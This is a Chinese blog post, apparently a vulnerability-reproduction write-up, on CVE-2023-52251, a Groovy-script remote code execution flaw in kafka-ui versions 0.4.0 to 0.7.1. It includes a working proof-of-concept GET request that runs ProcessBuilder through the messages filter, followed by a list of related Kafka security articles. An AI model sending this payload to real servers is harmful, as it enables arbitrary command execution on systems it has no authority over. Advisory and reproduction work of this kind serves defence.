Apache-Kafka的UI中的远程代码执行CVE-2023-52251

最新推荐文章于 2025-11-22 07:18:28 发布
原创 最新推荐文章于 2025-11-22 07:18:28 发布 · 248 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#kafka #安全威胁分析 #web安全 #漏洞复现 #漏洞库

漏洞描述

Kafka UI 存在一个严重的远程代码执行漏洞,该漏洞源于消息过滤组件中未对 Groovy 脚本进行沙盒化处理,导致攻击者可执行任意代码。

该漏洞被标识为 CVE-2023-52251,影响范围广泛且利用门槛较低,对 Apache Kafka 的后台系统构成重大安全威胁。

影响版本

Provectus 开发的 Apache Kafka 管理界面(kafka-ui),受影响版本为 0.4.0 至 0.7.1

poc

GET /api/clusters/local/topics/topic/messages?q=new+ProcessBuilder%28%22touch%22%2C%22%2Ftmp%2Fpwnd.txt%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
Host: 127.0.0.1:8091

漏洞来源

Kafka UI:简化您的消息队列管理体验
CvhShell的博客
09-21 882
Kafka UI是一个基于Web的界面,旨在简化Kafka集群的管理和监控。它提供了直观的用户界面,可以方便地查看和操作Kafka的主题、分区、消费者组等重要组件。通过Kafka UI,您可以执行以下操作:查看主题和分区:Kafka UI允许您查看已创建的主题和它们的分区。您可以轻松地浏览主题中的消息、查看偏移量以及监控分区的状态。发送和消费消息:使用Kafka UI,您可以轻松地向特定主题发送消息,并查看发送消息的状态。此外,您还可以消费特定主题的消息,并查看消费进度和消费者组的状态。
Kafka漏洞修复之CVE-2023-25194修复措施验证
CharlesYan的博客
02-19 6278
Apache Kafka Connect 模块通过JNDI 注入任意代码漏洞修复措施验证,包括Linux安装多版本JDK动态切换、验证OpenJDK与Kafka3.4.0的兼容性以及Linux中文件配置的优先级等
Kafka-UI:终极Apache Kafka集群管理解决方案
最新发布
gitblog_01029的博客
11-22 546
Kafka-UI是一个免费开源的Web界面工具,专门为Apache Kafka集群提供完整的管理和监控功能。这个简单易用的工具让您的数据流变得可视化,帮助您快速发现并解决故障,实现最优性能表现。 ## 项目核心价值与定位 在现代数据架构中,Apache Kafka已成为流处理平台的核心组件。然而,原生的Kafka命令行工具对于日常运维和监控来说往往不够直观。Kafka-UI正是为了解决这一痛点
漏洞真实影响分析Apache Kafka Connect 模块JNDI注入(CVE-2023-25194)
murphysec的博客
02-13 4996
Apache Kafka Connect 是Kafka中用于和其他数据系统传输数据的服务,其独立运行版本可以在Kafka发布包中通过bin/connect-standalone.sh启动,默认会在8083端口开启HTTP REST API服务,可对连接器(Connector)的配置进行操作
两个远程代码执行漏洞分析
若有战,召必回
12-22 1194
这个版本比起多条利用链的3.2.1版本,添加了一个配置 org.apache.commons.collections.enableUnsafeSerialization,这个配置用来检测反序列化是否安全,不安全的会抛出异常,所以要想办法设置org.apache.commons.collections.enableUnsafeSerialization=true。方法的前面都是,参数的设置,如果为空则修改为默认值,然后将处理好的参数传入this.messagesService.loadMessages。
Kafka ui 搭建以及使用
热门推荐
青冬的博客
12-07 2万+
kafka 本身没有自带相关的 ui 界面,但是很多时候没有页面意味着只有使用命令行进行相关操作如创建 topic、更改 topic 信息、重置 offset 等等。但实际使用中这种效果很差劲,我们一般还是会借助其他软件,实现对 kafka 的页面管控。结合这张图与实际体验,推荐大家使用 ui for apache kafka 进行 kafkaui 界面化管理。其实 kafka-ui 是没有安装过程的,在 github 上已经打包成了 jar 包,当前最新版本为 ,下载地址如下:https://git
Apache Kafka 漏洞CVE-2023-25194】说明及解决建议
EdwardWang_的博客
02-10 1万+
Apache Kafka 漏洞CVE-2023-25194】说明 及 解决建议
Goby 漏洞发布|kafka-ui messages 远程代码执行漏洞CVE-2023-52251
m0_46699477的博客
02-29 1439
kafka-ui 项目是由 Provectus 公司开发和维护的,旨在为 Kafka 用户提供一个可视化管理工具,简化 Kafka 集群的管理和监控任务。kafka-ui 在 /api/clusters/local/topics/{topic}/messages 的 q 参数中存在远程代码执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
Kafka反序列化RCE漏洞CVE-2023-34040)
蚁景网安学院
11-03 1161
Spring Kafka 是 Spring Framework 生态系统中的一个模块,用于简化在 Spring 应用程序中集成 Apache Kafka 的过程,记录 (record) 指 Kafka 消息中的一条记录。这一个漏洞所影响的组件其实是 Spring-Kafka,严格意义上来说并不算是 kafka漏洞,应该算是 Spring 的漏洞
【亲测免费】 探索与管理Apache Kafka的利器——UI for Apache Kafka
gitblog_00735的博客
08-08 2061
探索与管理Apache Kafka的利器——UI for Apache Kafka 【免费下载链接】kafka-ui provectus/kafka-ui: Kafka-UI 是一个用于管理和监控Apache Kafka集群的开源Web UI工具,提供诸如主题管理、消费者组查看、生产者测试等功能,便于对Kafka集群进行...
Apache Kafka UI :一款功能丰富且美观的 Kafka 开源管理平台!!
java_121388的博客
04-15 1728
对数据使用现成的 Serde。
修复 Apache Kafka 中的远程代码执行漏洞CVE-2023-25194
11-30 1512
Kafka Connect 中发现可能的 RCE 和拒绝服务问题。更新 阿帕奇软件基金会 (ASF) 已解决了一个漏洞,该漏洞可被利用来使用 Kafka Connect 发起远程代码执行 (RCE) 攻击。该关键漏洞于 2 月 8 日公布,被追踪为 CVE-2023-25194。Apache Kafka Connect 是 Apache Kafka 的一个免费开源组件,是系统、数据库和键值存储之间数据集成的中心枢纽。
【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
xsharkrasp的博客
06-09 2397
Apache Kafka是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect是一种用于在kafka和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于SASLJAAS 配置和SASL 协议的任意Kafka客户端,对Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行JNDI 注入来实现远程代码执行
漏洞复现-Apache Kafka Clients JNDI注入漏洞 (CVE-2023-25194)
玄道的网安博客
08-11 891
在版本3.3.2及以前,Apache Kafka clients中存在一处JNDI注入漏洞。如果攻击者在连接的时候可以控制属性sasl.jaas.config的值为com.sun.security.auth.module.JndiLoginModule,则可以发起JNDI连接,进而导致JNDI注入漏洞,执行任意命令。方法,做完客户端的判断和安全协议的判断之后,调用了。判断 SASL 模式是否开启,开启了才会往下跟进到。方法,跟进,发现其中还是加载了一些配置。方法,最后 Jndi 注入。
开源的 Kafka 管理平台
Admans的专栏
09-09 1510
对数据使用现成的 Serde。
Apache Kafka 可视化工具调研
hantangduhey的博客
09-05 7204
Apache Kafka 可视化工具调研
Kafka安全优化文档:漏洞修复到安全加固
虽非技冠群英首,愿与同道共长歌; 大鹏一日同风起,扶摇直上九万里;
12-30 2245
Kafka安全优化文档:漏洞修复到安全加固
【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)
OSCS开源安全社区
08-25 1093
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全
kafka管理工具之kafka-ui的环境搭建笔记
IT布道
09-11 6798
kafka-ui是一款管理kafka的工具,基于web的模式,一款优秀的开源项目。本文是在搭建kafka-ui的本地环境时,遇到的各种问题,现将其解决办法记录于此。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值